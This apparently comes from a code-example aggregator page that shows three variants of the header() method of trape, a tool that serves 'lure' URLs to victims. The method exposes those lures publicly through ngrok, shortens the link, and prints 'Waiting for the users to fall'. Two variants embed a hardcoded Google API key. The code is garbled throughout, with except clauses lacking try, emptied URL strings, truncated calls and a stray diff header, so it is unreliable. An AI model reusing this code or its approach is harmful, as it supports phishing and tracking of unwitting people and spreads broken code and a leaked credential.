Пример #1
	def header(self):
		if self.stat == 1:
			# Principal header of tool

			# Update verification
			changeLog = requests.get("https://raw.githubusercontent.com/jofpin/trape/master/version.txt", timeout = 4)
			changeLog = changeLog.text.split(" ")[1]
			changeLog = changeLog.strip()
			if changeLog != self.version:
				utils.Go(utils.Color['white'] + "\t" + utils.Color['yellowBold'] + "@" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['whiteBold'] + " " + "UPDATES:" + " " + utils.Color['yellowBold'] + "NEW VERSION IS AVAILABLE: " + utils.Color['white'] + "v" + utils.Color['redBold'] + changeLog + utils.Color['white'] + " " + "(install changes)")
				utils.Go(utils.Color['white'] + "\t" + utils.Color['yellowBold'] + "@" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['whiteBold'] + " " + "UPDATES:" + " " + utils.Color['greenBold'] + "RUNNING RECENT VERSION" + utils.Color['white'])

			# Local information vars	
			utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] + "LOCAL INFORMATION" + utils.Text['end'])
			utils.Go("\t" + "-------------------")
			utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Lure for the users: " + utils.Color['blue'] + 'http://' + self.localIp + ':' + str(self.app_port) + '/' + self.victim_path)
			utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Your REST API path: " + utils.Color['blue'] + 'http://' + self.localIp + ':' + str(self.app_port) + '/' + self.injectURL + utils.Color['white'])
			utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Control Panel Link: " + utils.Color['blue'] + "" + utils.Color['blue'] + str(self.app_port) + '/' + self.stats_path)
			utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Your Access key: " + utils.Color['blue'] + self.stats_key + utils.Color['white'])
			if self.ngrok != '':
				if self.googl == '':
					self.googl = 'AIzaSyCPzcppCT27KTHnxAIQvYhtvB_l8sKGYBs'
					opener = urllib2.build_opener()
					pLog = 4040
					ngrokStatus = str(opener.open('' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
					ngrokUrlPos = ngrokStatus.find('ngrok.io')
					if ngrokUrlPos <= 0:
						ngrokStatus = str(opener.open('' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
						ngrokUrlPos = ngrokStatus.find('ngrok.io')
					if ngrokUrlPos >= 0:
						ngrokStatus = ngrokStatus[ngrokUrlPos-25:ngrokUrlPos+28]
						ngrokUrlPos = ngrokStatus.find('http')
						ngrokUrlPos2 = ngrokStatus.find('.io')
						ngrokStatus = ngrokStatus[ngrokUrlPos: ngrokUrlPos2] + '.io'
						utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] + "PUBLIC INFORMATION" + utils.Text['end'])
						utils.Go("\t" + "-------------------")
						r = utils.gShortener(self.googl, ngrokStatus.replace('https', 'http') + '/' + self.victim_path)
						self.nGrokUrl = ngrokStatus.replace('https', 'http')
						utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Public lure: " + utils.Color['blue'] + self.nGrokUrl + '/' + self.victim_path + utils.Color['white'])
						utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Control Panel link: " + utils.Color['blue'] + ngrokStatus.replace('https', 'http') + '/' + self.stats_path + utils.Color['white'])
						utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
				except Exception as e:
					utils.Go(utils.Color['white'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR: " + " " + utils.Color['white'] + e.message)
					utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
			utils.Go("\n" + utils.Color['white'])
			utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + ">" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + "Start time:" + " " + utils.Color['white'] + self.date_start)
			utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "?" + utils.Color['white'] + "]" + utils.Color['white'] + " " + "Do not forget to close " + self.name_trape + ", after use. Press Control C" + " " + utils.Color['white'] + '\n')
			utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "¡" + utils.Color['white'] + "]" + utils.Color['white'] + " " + "Waiting for the users to fall..." + "\n")
Пример #2
					ngrokStatus = str(opener.open('' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
					ngrokUrlPos = ngrokStatus.find('ngrok.io')
@@ -225,6 +228,7 @@ def header(self):
					if ngrokUrlPos <= 0:
						ngrokStatus = str(opener.open('' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
						ngrokUrlPos = ngrokStatus.find('ngrok.io')
					if ngrokUrlPos >= 0:
						ngrokStatus = ngrokStatus[ngrokUrlPos-25:ngrokUrlPos+28]
						ngrokUrlPos = ngrokStatus.find('http')
						ngrokUrlPos2 = ngrokStatus.find('.io')
						ngrokStatus = ngrokStatus[ngrokUrlPos: ngrokUrlPos2] + '.io'
						utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] + "PUBLIC INFORMATION" + utils.Text['end'])
						utils.Go("\t" + "-------------------")
						r = utils.gShortener(self.googl, ngrokStatus.replace('https', 'http') + '/' + self.victim_path)
						#gooGl = json.loads(r._content)
						#if r.status_code == 200:
						#	utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Link shortened lure: " + utils.Color['blue'] + gooGl['id']  + utils.Color['white'] + " " + "(share)")
						#	utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR: " + " gooGl " + utils.Color['white'] + gooGl['error']['errors'][0]['reason'])
						self.nGrokUrl = ngrokStatus.replace('https', 'http')
						utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Public lure: " + utils.Color['blue'] + self.nGrokUrl + '/' + self.victim_path + utils.Color['white'])
						utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Control Panel link: " + utils.Color['blue'] + ngrokStatus.replace('https', 'http') + '/' + self.stats_path + utils.Color['white'])

						utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
				except Exception as e:
					utils.Go(utils.Color['white'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR: " + " " + utils.Color['white'] + e.message)
					utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
			utils.Go("\n" + utils.Color['white'])
Пример #3
    def header(self):
        if self.stat == 1:
            utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] +
                     "LOCAL INFORMATION" + utils.Text['end'])
            utils.Go("\t" + "-------------------")
            utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" +
                     utils.Color['white'] + "-" + utils.Color['blue'] + "=" +
                     utils.Color['white'] + "[" + utils.Color['white'] +
                     " Lure for the users: " + utils.Color['blue'] +
                     'http://' + self.localIp + ':' + str(self.app_port) +
                     '/' + self.victim_path)
            utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" +
                     utils.Color['white'] + "-" + utils.Color['blue'] + "=" +
                     utils.Color['white'] + "[" + utils.Color['white'] +
                     " Your REST API path: " + utils.Color['blue'] +
                     'http://' + self.localIp + ':' + str(self.app_port) +
                     '/' + self.injectURL + utils.Color['white'])
            utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" +
                     utils.Color['white'] + "-" + utils.Color['blue'] + "=" +
                     utils.Color['white'] + "[" + utils.Color['white'] +
                     " Control Panel Link: " + utils.Color['blue'] +
                     "" + utils.Color['blue'] +
                     str(self.app_port) + '/' + self.stats_path)
            utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" +
                     utils.Color['white'] + "-" + utils.Color['blue'] + "=" +
                     utils.Color['white'] + "[" + utils.Color['white'] +
                     " Your Access key: " + utils.Color['blue'] +
                     self.stats_key + utils.Color['white'])
            if self.ngrok != '':
                if self.googl == '':
                    self.googl = 'AIzaSyCPzcppCT27KTHnxAIQvYhtvB_l8sKGYBs'
                    opener = urllib2.build_opener()
                    fileLog = open(self.stats_path + '.nlog', 'r')
                    log = fileLog.read().replace('\n', '').replace(' ', '')
                    pLog = log.find('') + 10
                    pLog = int(log[pLog:pLog + 4])
                    os.remove(self.stats_path + '.nlog')
                    ngrokStatus = str(
                        opener.open('' +
                                    str(pLog) + '/status').read()).replace(
                                        '\n', '').replace(' ', '')
                    ngrokUrlPos = ngrokStatus.find('ngrok.io')
                    if ngrokUrlPos <= 0:
                        ngrokStatus = str(
                            opener.open('' +
                                        str(pLog) + '/status').read()).replace(
                                            '\n', '').replace(' ', '')
                        ngrokUrlPos = ngrokStatus.find('ngrok.io')
                    if ngrokUrlPos >= 0:
                        ngrokStatus = ngrokStatus[ngrokUrlPos -
                                                  25:ngrokUrlPos + 28]
                        ngrokUrlPos = ngrokStatus.find('http')
                        ngrokUrlPos2 = ngrokStatus.find('.io')
                        ngrokStatus = ngrokStatus[
                            ngrokUrlPos:ngrokUrlPos2] + '.io'
                        utils.Go(utils.Color['white'] + "\t" +
                                 utils.Color['whiteBold'] +
                                 "PUBLIC INFORMATION" + utils.Text['end'])
                        utils.Go("\t" + "-------------------")
                        r = utils.gShortener(
                            ngrokStatus.replace('https', 'http') + '/' +
                        gooGl = json.loads(r._content)
                        if r.status_code == 200:
                            utils.Go(utils.Color['white'] + "\t" +
                                     utils.Color['yellow'] + ">" +
                                     utils.Color['white'] + "-" +
                                     utils.Color['blue'] + "=" +
                                     utils.Color['white'] + "[" +
                                     utils.Color['white'] +
                                     " Link shortened lure: " +
                                     utils.Color['blue'] + gooGl['id'] +
                                     utils.Color['white'] + " " + "(share)")
                            utils.Go(utils.Color['whiteBold'] + "[" +
                                     utils.Color['redBold'] + "x" +
                                     utils.Color['whiteBold'] + "]" +
                                     utils.Color['redBold'] + " " + "ERROR: " +
                                     " " + utils.Color['white'] +
                        self.nGrokUrl = ngrokStatus.replace('https', 'http')
                        utils.Go(utils.Color['white'] + "\t" +
                                 utils.Color['yellow'] + ">" +
                                 utils.Color['white'] + "-" +
                                 utils.Color['blue'] + "=" +
                                 utils.Color['white'] + "[" +
                                 utils.Color['white'] + " Public lure: " +
                                 utils.Color['blue'] + self.nGrokUrl + '/' +
                                 self.victim_path + utils.Color['white'])
                        utils.Go(utils.Color['white'] + "\t" +
                                 utils.Color['yellow'] + ">" +
                                 utils.Color['white'] + "-" +
                                 utils.Color['blue'] + "=" +
                                 utils.Color['white'] + "[" +
                                 utils.Color['white'] +
                                 " Control Panel link: " +
                                 utils.Color['blue'] +
                                 ngrokStatus.replace('https', 'http') + '/' +
                                 self.stats_path + utils.Color['white'])

                        utils.Go(utils.Color['red'] + "\t" +
                                 utils.Color['green'] + "-" +
                                 utils.Color['white'] + "--" +
                                 utils.Color['red'] + "=" +
                                 utils.Color['white'] + "[" +
                                 utils.Color['white'] +
                                 " We can't connect with nGrok " +
                except Exception as e:
                    utils.Go(utils.Color['white'] + "[" +
                             utils.Color['redBold'] + "x" +
                             utils.Color['whiteBold'] + "]" +
                             utils.Color['redBold'] + " " + "ERROR: " + " " +
                             utils.Color['white'] + e)
                    utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] +
                             "-" + utils.Color['white'] + "--" +
                             utils.Color['red'] + "=" + utils.Color['white'] +
                             "[" + utils.Color['white'] +
                             " We can't connect with nGrok " +
            utils.Go("\n" + utils.Color['white'])
            utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] +
                     ">" + utils.Color['white'] + "]" +
                     utils.Color['whiteBold'] + " " + "Start time:" + " " +
                     utils.Color['white'] + self.date_start)
            utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] +
                     "?" + utils.Color['white'] + "]" + utils.Color['white'] +
                     " " + "Do not forget to close " + self.name_trape +
                     ", after use. Press Control C" + " " +
                     utils.Color['white'] + '\n')
            utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] +
                     "¡" + utils.Color['white'] + "]" + utils.Color['white'] +
                     " " + "Waiting for the users to fall..." + "\n")